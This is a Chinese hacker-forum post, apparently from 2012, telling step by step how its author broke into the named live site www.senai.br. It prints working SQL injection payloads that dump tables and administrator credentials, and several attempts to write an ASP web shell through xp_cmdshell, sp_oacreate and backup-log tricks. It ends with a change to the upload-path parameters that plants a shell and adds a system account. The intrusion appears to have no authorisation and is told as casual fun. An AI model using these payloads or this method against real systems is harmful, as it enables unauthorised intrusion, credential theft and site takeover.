标题:入侵巴西最大门户网站
作者:hackdn
转载注明
大家新年好,过年了,2012你的船票买好了么?
今天是除夕,貌似农历没大年三十
下午上网没事儿做,朋友甩来一网站,让我顺便帮帮安检了下,他让发下过程,就随便写写,有点乱,
主要是后台拿SHELL费劲了半天,高手直接飞过吧。。
巴西最大门户网站www.senai.br(塞纳工业 - -!)
GG搜了下,出来的点肯定都是不能直接注入的,该过滤的都过滤掉了~
工具扫了下,IIS 6的组建,幸好找到了后台路径
http://www.senai.br/admin/login.aspx
弱口令试了遍,进不去,'or''=' 没反应'or'='or'直接报错,幸亏没禁MAGIC.
看返回的组建信息,权限应该是SYS的错不了
好吧,试试可否执行语句
直接登陆框'and ( select @ @ version )=1--如图
哎,到这里大家该散的就散了,下面都是一般的步骤
'/**/and/**/user=1--
SQL用户是senai_web
'/**/and/**/(select/**/db_name())=1--
database:SENAI_WEB
直接爆吧
'/**/and/**/
(select/**/top/**/1/**/name/**/from/**/senai_web.dbo.sysobjects/**/where/**/xtype='U')=1--
Material_Equipamento_Produto
应该不是这表,加进去
'/**/and/**/
(select/**/top/**/1/**/name/**/from/**/senai_web.dbo.sysobjects/**/where/**/xtype='U'/**/an
d/**/name/**/not/**/in/**/('Material_Equipamento_Produto','Materia'))=1--
之后爆到Materia就不动了。 - -
OK,直接:
'/**/and/**/(select/**/top/**/1/**/col_name(object_id('Materia'),1)/**/from Materia)=1--
还是Materia
考虑,这样子效率太低了,用HAVING试试
'/**/having/**/1=1-- 直接出来了表结果'Usuarios.usuCodigo'
实在是不懂巴西文~
谷歌翻译了下Usuarios意识是用户名
admin不出来Usuarios就应该是对的了
'/**/and/**/(select/**/top/**/1/**/col_name(object_id('Usuarios'),1)/**/from Usuarios)=1--
出来usuCodigo,试了好久不是用户名的列。第二个是usuSenha,这个肯定是密码的。
第四个ID才是usuLogin的用户名。好了
'/**/and/**/(select/**/top/**/1/**/usuLogin++usuSenha/**/from/**/Usuarios)=1--
click agclick
出来的账户密码直接后台登进去了
进去傻眼了,都是鸟文 如图。装了几个翻译插件都用不了。。。。
好吧,退出来,希望登陆界面的MSSQL权限是SA~~~~就直接ADD CMD_SHELL组建吧
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
返回必须SYS权限,郁闷
试试sp_oacreate:
' Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod
@s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%
^>>C:\Inetpub\wwwroot\ProjetoSenai2\Componentes_Codigos_fontes\Admin\1.txt';
路径为返回爆出的路径
可惜没权限。。。。sp_makewebtask也不行
好吧,寄权限与DB权限咯,不能差异备份就邪门了~~~!!!
' create table [hackdn_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select
@a=db_name(),@s=0x62696E backup log @a to into [hackdn_cmd](cmd)values('<%
execute(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name
(),@t='D:\Dados\datainet\www\ENSI\SENAI\Site Senai\Web\1.txt' backup log @b to with
init,no_truncate;drop table [hackdn_cmd];
再访问,也不行。。。
苦逼了很久才找到上传点
可惜过滤了后缀呀。。。上传asp;jpg也自动修改为随机MD5的JPG了
好吧,瞎转悠后,发现了这个上传点的路径为:
http://www.senai.br/admin/bibliotecaArquivos/upload.aspx?
publicacoes_Action=Upload&tipoArquivo=doc,pdf&localSave=../../upload/publicacoes/&field=pub
licacoes_arquivo&fieldSimples=arquivo&tipoArquivoField=publicacoes_TipoDoArquivo&tamanhoArq
uivoField=publicacoes_tamanhoDoArquivo
看到了上传的文件目录,希望它是单文件没过滤哈~~
抱着试试看的心态修改下上传目录:
http://www.senai.br/admin/bibliotecaArquivos/upload.aspx?
publicacoes_Action=Upload&tipoArquivo=doc,pdf&localSave=../../upload/1.asp/&field=publicaco
es_arquivo&fieldSimples=arquivo&tipoArquivoField=publicacoes_TipoDoArquivo&tamanhoArquivoFi
eld=publicacoes_tamanhoDoArquivo
上传成功!!!直接返回了路径呀~如图:
可惜打不开,而且图中的返回信息也说得是Could not find a part of the path。找不到路径啊
估计肯定是没建立目录了。。。
仔细看了看URL,尼玛直接把tipoArquivo输入值作为最后判定的FILE赋值的后缀 - -!
上传后右键源码直接看到了地址!!
OK,SHELL就直接拿到手了,在线CMD可以直接加SYS账户
就这样了,详细也够啰嗦了。。。等着一会儿看春晚咯~~~
祝大家龙年事业顺利,顺心如意,家庭和睦,快快乐乐发大财!!!